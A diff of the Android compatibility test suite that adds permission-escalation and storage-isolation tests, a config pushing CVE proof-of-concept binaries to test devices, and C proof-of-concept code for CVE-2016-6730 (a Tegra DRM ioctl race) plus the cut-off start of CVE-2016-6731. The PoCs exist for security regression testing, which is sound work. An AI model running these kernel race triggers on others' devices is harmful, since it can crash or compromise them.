assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_22), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest22",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest22",
"testAllPermissionsGrantedByDefault");
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), true, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testAllPermissionsGrantedOnUpgrade");
}
@@ -253,12 +261,12 @@
public void testNoResidualPermissionsOnUninstall() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testNoResidualPermissionsOnUninstall_part1");
- assertNull(getDevice().uninstallPackage(PKG));
+ assertNull(getDevice().uninstallPackage(USES_PERMISSION_PKG));
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testNoResidualPermissionsOnUninstall_part2");
}
@@ -266,28 +274,38 @@
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_22), false, false));
try {
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest22",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest22",
"testRevokePropagatedOnUpgradeOldToNewModel_part1");
fail("App must be killed on a permission revoke");
} catch (AssertionError expected) {
}
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), true, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testRevokePropagatedOnUpgradeOldToNewModel_part2");
}
public void testRevokePropagatedOnUpgradeNewToNewModel() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testRevokePropagatedOnUpgradeNewToNewModel_part1");
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), true, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testRevokePropagatedOnUpgradeNewToNewModel_part2");
}
+ public void testNoPermissionEscalation() throws Exception {
+ assertNull(getDevice().installPackage(MigrationHelper.getTestFile(
+ mCtsBuild, APK_DECLARE_NON_RUNTIME_PERMISSIONS), false, false));
+ assertNull(getDevice().installPackage(MigrationHelper.getTestFile(
+ mCtsBuild, APK_ESCLATE_TO_RUNTIME_PERMISSIONS), true, false));
+ runDeviceTests(ESCALATE_PERMISSION_PKG,
+ "com.android.cts.escalatepermission.PermissionEscalationTest",
+ "testCannotEscalateNonRuntimePermissionsToRuntime");
+ }
+
private void runDeviceTests(String packageName, String testClassName, String testMethodName)
throws DeviceNotAvailableException {
Utils.runDeviceTests(getDevice(), packageName, testClassName, testMethodName);
diff --git a/hostsidetests/appsecurity/test-apps/DeclareNotRuntimePermissions/Android.mk b/hostsidetests/appsecurity/test-apps/DeclareNotRuntimePermissions/Android.mk
new file mode 100644
index 0000000..b98ba68
--- /dev/null
+++ b/hostsidetests/appsecurity/test-apps/DeclareNotRuntimePermissions/Android.mk
@@ -0,0 +1,29 @@
+#
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+
+LOCAL_MODULE_TAGS := tests
+
+LOCAL_PACKAGE_NAME := CtsDeclareNonRuntimePermissions
+
+LOCAL_COMPATIBILITY_SUITE := cts
+
+LOCAL_DEX_PREOPT := false
+
+include $(BUILD_CTS_SUPPORT_PACKAGE)
diff --git a/hostsidetests/appsecurity/test-apps/DeclareNotRuntimePermissions/AndroidManifest.xml b/hostsidetests/appsecurity/test-apps/DeclareNotRuntimePermissions/AndroidManifest.xml
new file mode 100644
index 0000000..411a66b
--- /dev/null
+++ b/hostsidetests/appsecurity/test-apps/DeclareNotRuntimePermissions/AndroidManifest.xml
@@ -0,0 +1,33 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!-- Copyright (C) 2016 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="com.android.cts.escalate.permission">
+
+ <permission android:name="com.android.cts.escalate.permission.STEAL_AUDIO1"
+ android:permissionGroup="android.permission-group.MICROPHONE"
+ android:protectionLevel="normal"/>
+
+ <permission android:name="com.android.cts.escalate.permission.STEAL_AUDIO2"
+ android:permissionGroup="android.permission-group.MICROPHONE"
+ android:protectionLevel="signature"/>
+
+ <uses-permission android:name="com.android.cts.escalate.permission.STEAL_AUDIO1"/>
+ <uses-permission android:name="com.android.cts.escalate.permission.STEAL_AUDIO2"/>
+
+ <application android:hasCode="false"/>
+
+</manifest>
diff --git a/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/Android.mk b/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/Android.mk
new file mode 100644
index 0000000..b1b7f83
--- /dev/null
+++ b/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/Android.mk
@@ -0,0 +1,35 @@
+#
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+
+LOCAL_MODULE_TAGS := tests
+
+LOCAL_STATIC_JAVA_LIBRARIES := android-support-test
+
+LOCAL_SRC_FILES := $(call all-java-files-under, src)
+
+LOCAL_PACKAGE_NAME := CtsEscalateToRuntimePermissions
+
+LOCAL_COMPATIBILITY_SUITE := cts
+
+LOCAL_PROGUARD_ENABLED := disabled
+
+LOCAL_DEX_PREOPT := false
+
+include $(BUILD_CTS_SUPPORT_PACKAGE)
diff --git a/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/AndroidManifest.xml b/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/AndroidManifest.xml
new file mode 100644
index 0000000..198bb39
--- /dev/null
+++ b/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/AndroidManifest.xml
@@ -0,0 +1,38 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!-- Copyright (C) 2016 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="com.android.cts.escalate.permission">
+
+ <permission android:name="com.android.cts.escalate.permission.STEAL_AUDIO1"
+ android:permissionGroup="android.permission-group.MICROPHONE"
+ android:protectionLevel="dangerous"/>
+
+ <permission android:name="com.android.cts.escalate.permission.STEAL_AUDIO2"
+ android:permissionGroup="android.permission-group.MICROPHONE"
+ android:protectionLevel="dangerous"/>
+
+ <uses-permission android:name="com.android.cts.escalate.permission.STEAL_AUDIO1"/>
+ <uses-permission android:name="com.android.cts.escalate.permission.STEAL_AUDIO2"/>
+
+ <application/>
+
+
+ <instrumentation
+ android:name="android.support.test.runner.AndroidJUnitRunner"
+ android:targetPackage="com.android.cts.escalate.permission" />
+
+</manifest>
diff --git a/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/res/values/strings.xml b/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/res/values/strings.xml
new file mode 100644
index 0000000..bd208bc
--- /dev/null
+++ b/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/res/values/strings.xml
@@ -0,0 +1,6 @@
+<?xml version="1.0" encoding="utf-8"?>
+
+<!-- Just need this dummy file to force building Manifest.java. -->
+<resources xmlns:xliff="urn:oasis:names:tc:xliff:document:1.2">
+ <string name="keysets_perm_desc">keysets_perm_description</string>
+</resources>
diff --git a/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/src/com/android/cts/escalatepermission/PermissionEscalationTest.java b/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/src/com/android/cts/escalatepermission/PermissionEscalationTest.java
new file mode 100644
index 0000000..bbe8e02
--- /dev/null
+++ b/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/src/com/android/cts/escalatepermission/PermissionEscalationTest.java
@@ -0,0 +1,50 @@
+/*
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package com.android.cts.escalatepermission;
+
+import android.content.Context;
+import android.content.pm.PermissionInfo;
+import android.support.test.InstrumentationRegistry;
+import android.support.test.runner.AndroidJUnit4;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import static org.junit.Assert.assertSame;
+
+import com.android.cts.escalate.permission.Manifest;
+
+@RunWith(AndroidJUnit4.class)
+public class PermissionEscalationTest {
+ @Test
+ public void testCannotEscalateNonRuntimePermissionsToRuntime() throws Exception {
+ Context context = InstrumentationRegistry.getTargetContext();
+
+ // Ensure normal permission cannot be made dangerous
+ PermissionInfo stealAudio1Permission1 = context.getPackageManager()
+ .getPermissionInfo(Manifest.permission.STEAL_AUDIO1, 0);
+ assertSame("Shouldn't be able to change normal permission to dangerous",
+ PermissionInfo.PROTECTION_NORMAL, (stealAudio1Permission1.protectionLevel
+ & PermissionInfo.PROTECTION_MASK_BASE));
+
+ // Ensure signature permission cannot be made dangerous
+ PermissionInfo stealAudio1Permission2 = context.getPackageManager()
+ .getPermissionInfo(Manifest.permission.STEAL_AUDIO2, 0);
+ assertSame("Shouldn't be able to change signature permission to dangerous",
+ PermissionInfo.PROTECTION_SIGNATURE, (stealAudio1Permission2.protectionLevel
+ & PermissionInfo.PROTECTION_MASK_BASE));
+ }
+ }
diff --git a/hostsidetests/appsecurity/test-apps/MultiUserStorageApp/src/com/android/cts/multiuserstorageapp/MultiUserStorageTest.java b/hostsidetests/appsecurity/test-apps/MultiUserStorageApp/src/com/android/cts/multiuserstorageapp/MultiUserStorageTest.java
index d9f00d2..3cf1443 100644
--- a/hostsidetests/appsecurity/test-apps/MultiUserStorageApp/src/com/android/cts/multiuserstorageapp/MultiUserStorageTest.java
+++ b/hostsidetests/appsecurity/test-apps/MultiUserStorageApp/src/com/android/cts/multiuserstorageapp/MultiUserStorageTest.java
@@ -17,15 +17,20 @@
package com.android.cts.multiuserstorageapp;
import static com.android.cts.externalstorageapp.CommonExternalStorageTest.assertDirNoAccess;
+import static com.android.cts.externalstorageapp.CommonExternalStorageTest.assertFileNoAccess;
import static com.android.cts.externalstorageapp.CommonExternalStorageTest.getAllPackageSpecificPathsExceptObb;
import static com.android.cts.externalstorageapp.CommonExternalStorageTest.readInt;
import static com.android.cts.externalstorageapp.CommonExternalStorageTest.writeInt;
+import android.content.ContentResolver;
+import android.content.ContentValues;
+import android.net.Uri;
import android.os.Environment;
import android.test.AndroidTestCase;
import android.util.Log;
import java.io.File;
+import java.io.FileNotFoundException;
/**
* Test multi-user emulated storage environment, ensuring that each user has
@@ -138,6 +143,36 @@
}
}
+ /**
+ * Verify that files cannot be accessed through media provider.
+ */
+ public void testMediaProviderUserIsolation() throws Exception {
+ final File myPath = Environment.getExternalStorageDirectory();
+ final int myId = android.os.Process.myUid() / 100000;
+ assertEquals(String.valueOf(myId), myPath.getName());
+
+ Log.d(TAG, "My path is " + myPath + " user id " + myId);
+ final File basePath = myPath.getParentFile();
+ for (int i = 0; i < 128; i++) {
+ if (i == myId) continue;
+ final File otherPath = new File(basePath,i + "/" + FILE_SINGLETON);
+ assertFileNoAccess(otherPath);
+
+ final String URI_MEDIA_STRING = "content://media/external/audio/media/";
+ ContentResolver contentResolver = mContext.getContentResolver();
+ ContentValues cv = new ContentValues();
+ cv.put("_data", otherPath.getAbsolutePath());
+ contentResolver.insert(Uri.parse(URI_MEDIA_STRING), cv);
+
+ try {
+ mContext.getContentResolver().openInputStream(Uri.parse(URI_MEDIA_STRING));
+ fail("Accessing through media provider should not be allowed. Path " + myPath);
+ } catch (FileNotFoundException expected) {
+ // OK
+ }
+ }
+ }
+
private File buildApiObbPath(String file) {
return new File(getContext().getObbDir(), file);
}
diff --git a/hostsidetests/security/AndroidTest.xml b/hostsidetests/security/AndroidTest.xml
index 0056e81..cd68c69 100644
--- a/hostsidetests/security/AndroidTest.xml
+++ b/hostsidetests/security/AndroidTest.xml
@@ -14,6 +14,38 @@
limitations under the License.
-->
<configuration description="Config for the CTS Security host tests">
+ <target_preparer class="com.android.compatibility.common.tradefed.targetprep.FilePusher">
+ <option name="cleanup" value="true" />
+ <option name="push" value="CVE-2016-8412->/data/local/tmp/CVE-2016-8412" />
+ <option name="push" value="CVE-2016-8444->/data/local/tmp/CVE-2016-8444" />
+ <option name="push" value="CVE-2016-8448->/data/local/tmp/CVE-2016-8448" />
+ <option name="push" value="CVE-2016-8449->/data/local/tmp/CVE-2016-8449" />
+ <option name="push" value="CVE-2016-8460->/data/local/tmp/CVE-2016-8460" />
+ <option name="push" value="CVE-2017-0403->/data/local/tmp/CVE-2017-0403" />
+ <option name="push" value="CVE-2017-0404->/data/local/tmp/CVE-2017-0404" />
+ <option name="push" value="CVE-2016-8482->/data/local/tmp/CVE-2016-8482" />
+ <option name="push" value="CVE-2017-0429->/data/local/tmp/CVE-2017-0429" />
+ <option name="push" value="CVE-2016-6730->/data/local/tmp/CVE-2016-6730" />
+ <option name="push" value="CVE-2016-6731->/data/local/tmp/CVE-2016-6731" />
+ <option name="push" value="CVE-2016-6732->/data/local/tmp/CVE-2016-6732" />
+ <option name="push" value="CVE-2016-6733->/data/local/tmp/CVE-2016-6733" />
+ <option name="push" value="CVE-2016-6734->/data/local/tmp/CVE-2016-6734" />
+ <option name="push" value="CVE-2016-6735->/data/local/tmp/CVE-2016-6735" />
+ <option name="push" value="CVE-2016-6736->/data/local/tmp/CVE-2016-6736" />
+ <option name="push" value="CVE-2016-8424->/data/local/tmp/CVE-2016-8424" />
+ <option name="push" value="CVE-2016-8425->/data/local/tmp/CVE-2016-8425" />
+ <option name="push" value="CVE-2016-8426->/data/local/tmp/CVE-2016-8426" />
+ <option name="push" value="CVE-2016-8427->/data/local/tmp/CVE-2016-8427" />
+ <option name="push" value="CVE-2016-8428->/data/local/tmp/CVE-2016-8428" />
+ <option name="push" value="CVE-2016-8429->/data/local/tmp/CVE-2016-8429" />
+ <option name="push" value="CVE-2016-8430->/data/local/tmp/CVE-2016-8430" />
+ <option name="push" value="CVE-2016-8431->/data/local/tmp/CVE-2016-8431" />
+ <option name="push" value="CVE-2016-8432->/data/local/tmp/CVE-2016-8432" />
+ <option name="push" value="CVE-2016-8434->/data/local/tmp/CVE-2016-8434" />
+ <option name="push" value="CVE-2016-8435->/data/local/tmp/CVE-2016-8435" />
+ <option name="push" value="CVE-2016-9120->/data/local/tmp/CVE-2016-9120" />
+ <option name="append-bitness" value="true" />
+ </target_preparer>
<test class="com.android.compatibility.common.tradefed.testtype.JarHostTest" >
<option name="jar" value="CtsSecurityHostTestCases.jar" />
<option name="runtime-hint" value="32s" />
diff --git a/hostsidetests/security/securityPatch/Android.mk b/hostsidetests/security/securityPatch/Android.mk
new file mode 100644
index 0000000..41a41d0
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Android.mk
@@ -0,0 +1,17 @@
+#
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+
+include $(call all-subdir-makefiles)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6730/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6730/Android.mk
new file mode 100644
index 0000000..14337ab
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6730/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6730
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6730/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6730/poc.c
new file mode 100644
index 0000000..bfcdb41
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6730/poc.c
@@ -0,0 +1,164 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define CLK_THREAD_NUM 900
+#define TRY_TIMES CLK_THREAD_NUM
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_GET_CLK_CONSTRAINT 0x12
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ volatile __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ volatile __u64 context;
+};
+
+struct drm_tegra_constraint {
+ __u64 context;
+ __u32 index;
+ __u32 type;
+ __u32 rate;
+ __u32 pad;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_GET_CLK_CONSTRAINT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_GET_CLK_CONSTRAINT, struct drm_tegra_constraint)
+int fd;
+pthread_t clk_thread_id[CLK_THREAD_NUM] = { 0 };
+
+volatile struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+volatile struct drm_tegra_constraint clk_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* clk_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(1){
+ ioctl(fd, DRM_IOCTL_TEGRA_GET_CLK_CONSTRAINT, &clk_c);
+ }
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create clk thread */
+ for(i = 0; i < CLK_THREAD_NUM; i++){
+ ret = pthread_create(clk_thread_id + i, NULL, clk_thread, NULL);
+ if(ret){
+ goto out_clk_thread;
+ }
+ }
+
+ while(try_time){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == 0){
+ try_time--;
+ /* set clk */
+ clk_c.context = open_c.context;
+ /* set close */
+ close_c.context = open_c.context;
+ usleep(500);
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ }
+
+out_clk_thread:
+ /* kill clk thread */
+ for(i = 0; i < CLK_THREAD_NUM; i++){
+ pthread_kill(clk_thread_id[i], SIGKILL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6731/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6731/Android.mk
new file mode 100644
index 0000000..718dbe3
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6731/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6731
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6731/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6731/poc.c
new file mode 100644
index 0000000..d6cedfb
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6731/poc.c
@@ -0,0 +1,165 @@
+/*
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define CLK_THREAD_NUM 900
+#define TRY_TIMES CLK_THREAD_NUM
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_SET_CLK_CONSTRAINT 0x13
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ volatile __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ volatile __u64 context;
+};
+
+struct drm_tegra_constraint {
+ __u64 context;
+ __u32 index;
+ __u32 type;
+ __u32 rate;
+ __u32 pad;
+};
+
+#define DRM_IOCTL_BASE 'd'
